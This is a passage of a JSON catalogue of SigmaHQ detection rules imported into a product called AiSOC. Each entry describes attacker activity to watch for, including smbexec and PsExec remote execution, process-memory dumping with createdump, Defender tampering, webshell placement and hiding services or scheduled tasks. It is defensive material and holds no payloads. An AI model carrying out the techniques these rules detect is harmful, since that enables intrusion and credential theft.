"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/silenttrinity-stager-msbuild-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" } }, { "id": "sigmahq-sigma-50e606bf-04ce-4ca7-9d54-3449494bbd4b", "type": "detection", "name": "Cisco LDP Authentication Failures", "description": "Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1110", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-ldp-authentication-failures.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50e606bf-04ce-4ca7-9d54-3449494bbd4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml" } }, { "id": "sigmahq-sigma-50f852e6-af22-4c78-9ede-42ef36aa3453", "type": "detection", "name": "Potential Azure Browser SSO Abuse", "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-azure-browser-sso-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "50f852e6-af22-4c78-9ede-42ef36aa3453", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml" } }, { "id": "sigmahq-sigma-512cf937-ea9b-4332-939c-4c2c94baadcd", "type": "detection", "name": "Azure Firewall Modified or Deleted", "description": "Identifies when a firewall is created, modified, or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-firewall-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "512cf937-ea9b-4332-939c-4c2c94baadcd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_firewall_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-512cff7a-683a-43ad-afe0-dd398e872f36", "type": "detection", "name": "OpenCanary - Telnet Login Attempt", "description": "Detects instances where a Telnet service on an OpenCanary node has had a login attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-telnet-login-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "512cff7a-683a-43ad-afe0-dd398e872f36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_telnet_login_attempt.yml" } }, { "id": "sigmahq-sigma-514e4c3a-c77d-4cde-a00f-046425e2301e", "type": "detection", "name": "Abuse of Service Permissions to Hide Services Via Set-Service", "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/abuse-of-service-permissions-to-hide-services-via-set-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml" } }, { "id": "sigmahq-sigma-514e7e3e-b3b4-4a67-af60-be20f139198b", "type": "detection", "name": "PUA - AdFind.EXE Execution", "description": "Detects execution of Adfind.exe utility, which can be used for reconnaissance in an Active Directory environment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-adfind-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "514e7e3e-b3b4-4a67-af60-be20f139198b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_adfind_execution.yml" } }, { "id": "sigmahq-sigma-515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "type": "detection", "name": "CreateDump Process Dump", "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/createdump-process-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_createdump_lolbin_execution.yml" } }, { "id": "sigmahq-sigma-516376b4-05cd-4122-bae0-ad7641c38d48", "type": "detection", "name": "Mailbox Export to Exchange Webserver", "description": "Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mailbox-export-to-exchange-webserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "516376b4-05cd-4122-bae0-ad7641c38d48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml" } }, { "id": "sigmahq-sigma-51719bf5-e4fd-4e44-8ba8-b830e7ac0731", "type": "detection", "name": "Creation Of A Local User Account", "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-a-local-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_create_account.yml" } }, { "id": "sigmahq-sigma-517490a7-115a-48c6-8862-1a481504d5a8", "type": "detection", "name": "Potential Shim Database Persistence via Sdbinst.EXE", "description": "Detects installation of a new shim using sdbinst.exe.\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-shim-database-persistence-via-sdbinst-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "517490a7-115a-48c6-8862-1a481504d5a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml" } }, { "id": "sigmahq-sigma-51aa9387-1c53-4153-91cc-d73c59ae1ca9", "type": "detection", "name": "Invoke-Obfuscation Obfuscated IEX Invocation - System", "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-obfuscated-iex-invocation-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml" } }, { "id": "sigmahq-sigma-51ae86a2-e2e1-4097-ad85-c46cb6851de4", "type": "detection", "name": "Renamed PsExec Service Execution", "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-psexec-service-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml" } }, { "id": "sigmahq-sigma-51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "type": "detection", "name": "Potential Windows Defender Tampering Via Wmic.EXE", "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-windows-defender-tampering-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml" } }, { "id": "sigmahq-sigma-51e33403-2a37-4d66-a574-1fda1782cc31", "type": "detection", "name": "RDP Login from Localhost", "description": "RDP login with localhost source address may be a tunnelled login", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-login-from-localhost.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "51e33403-2a37-4d66-a574-1fda1782cc31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_rdp_localhost_login.yml" } }, { "id": "sigmahq-sigma-5205613d-2a63-4412-a895-3a2458b587b3", "type": "detection", "name": "Network Connection Initiated By AddinUtil.EXE", "description": "Detects a network connection initiated by the Add-In deployment cache updating utility \"AddInutil.exe\".\nThis could indicate a potential command and control communication as this tool doesn't usually initiate network activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-by-addinutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5205613d-2a63-4412-a895-3a2458b587b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_addinutil_initiated.yml" } }, { "id": "sigmahq-sigma-52182dfb-afb7-41db-b4bc-5336cb29b464", "type": "detection", "name": "Suspicious File Download From File Sharing Websites - File Stream", "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-download-from-file-sharing-websites-file-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml" } }, { "id": "sigmahq-sigma-5259cbf2-0a75-48bf-b57a-c54d6fabaef3", "type": "detection", "name": "Bitbucket User Details Export Attempt Detected", "description": "Detects user data export activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1213", "T1082", "T1591.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-user-details-export-attempt-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5259cbf2-0a75-48bf-b57a-c54d6fabaef3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_user_details_export_attempt_detected.yml" } }, { "id": "sigmahq-sigma-526be59f-a573-4eea-b5f7-f0973207634d", "type": "detection", "name": "New Process Created Via Wmic.EXE", "description": "Detects new process creation using WMIC via the \"process call create\" flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-process-created-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "526be59f-a573-4eea-b5f7-f0973207634d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_process_creation.yml" } }, { "id": "sigmahq-sigma-526cc8bc-1cdc-48ad-8b26-f19bff969cec", "type": "detection", "name": "Removal Of Index Value to Hide Schedule Task - Registry", "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/removal-of-index-value-to-hide-schedule-task-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml" } }, { "id": "sigmahq-sigma-52753ea4-b3a0-4365-910d-36cff487b789", "type": "detection", "name": "Hijack Legit RDP Session to Move Laterally", "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hijack-legit-rdp-session-to-move-laterally.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52753ea4-b3a0-4365-910d-36cff487b789", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml" } }, { "id": "sigmahq-sigma-52788a70-f1da-40dd-8fbd-73b5865d6568", "type": "detection", "name": "JScript Compiler Execution", "description": "Detects the execution of the \"jsc.exe\" (JScript Compiler).\nAttacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/jscript-compiler-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52788a70-f1da-40dd-8fbd-73b5865d6568", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_jsc_execution.yml" } }, { "id": "sigmahq-sigma-52a85084-6989-40c3-8f32-091e12e13f09", "type": "detection", "name": "smbexec.py Service Installation", "description": "Detects the use of smbexec.py tool by detecting a specific service installation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/smbexec-py-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52a85084-6989-40c3-8f32-091e12e13f09", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_hack_smbexec.yml" } }, { "id": "sigmahq-sigma-52cad028-0ff0-4854-8f67-d25dfcbc78b4", "type": "detection", "name": "HTML Help HH.EXE Suspicious Child Process", "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1059.001", "T1059.003", "T1059.005", "T1059.007", "T1218", "T1218.001", "T1218.010", "T1218.011", "T1566", "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/html-help-hh-exe-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml" } }, { "id": "sigmahq-sigma-52d097e2-063e-4c9c-8fbb-855c8948d135", "type": "detection", "name": "Suspicious Windows Update Agent Empty Cmdline", "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windows-update-agent-empty-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52d097e2-063e-4c9c-8fbb-855c8948d135", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml" } }, { "id": "sigmahq-sigma-52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "type": "detection", "name": "First Time Seen Remote Named Pipe", "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/first-time-seen-remote-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_lm_namedpipe.yml" } }, { "id": "sigmahq-sigma-52ff7941-8211-46f9-84f8-9903efb7077d", "type": "detection", "name": "HackTool - PPID Spoofing SelectMyParent Tool Execution", "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-ppid-spoofing-selectmyparent-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52ff7941-8211-46f9-84f8-9903efb7077d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_selectmyparent.yml" } }, { "id": "sigmahq-sigma-53059bc0-1472-438b-956a-7508a94a91f0", "type": "detection", "name": "Disable System Firewall", "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-system-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53059bc0-1472-438b-956a-7508a94a91f0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/service_stop/lnx_auditd_disable_system_firewall.yml" } }, { "id": "sigmahq-sigma-530a6faa-ff3d-4022-b315-50828e77eef5", "type": "detection", "name": "Anydesk Remote Access Software Service Installation", "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/anydesk-remote-access-software-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "530a6faa-ff3d-4022-b315-50828e77eef5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_anydesk.yml" } }, { "id": "sigmahq-sigma-53330955-dc52-487f-a3a2-da24dcff99b5", "type": "detection", "name": "New BgInfo.EXE Custom DB Path Registry Configuration", "description": "Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-bginfo-exe-custom-db-path-registry-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53330955-dc52-487f-a3a2-da24dcff99b5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_bginfo_custom_db.yml" } }, { "id": "sigmahq-sigma-53389db6-ba46-48e3-a94c-e0f2cefe1583", "type": "detection", "name": "MITRE BZAR Indicators for Persistence", "description": "Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mitre-bzar-indicators-for-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53389db6-ba46-48e3-a94c-e0f2cefe1583", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 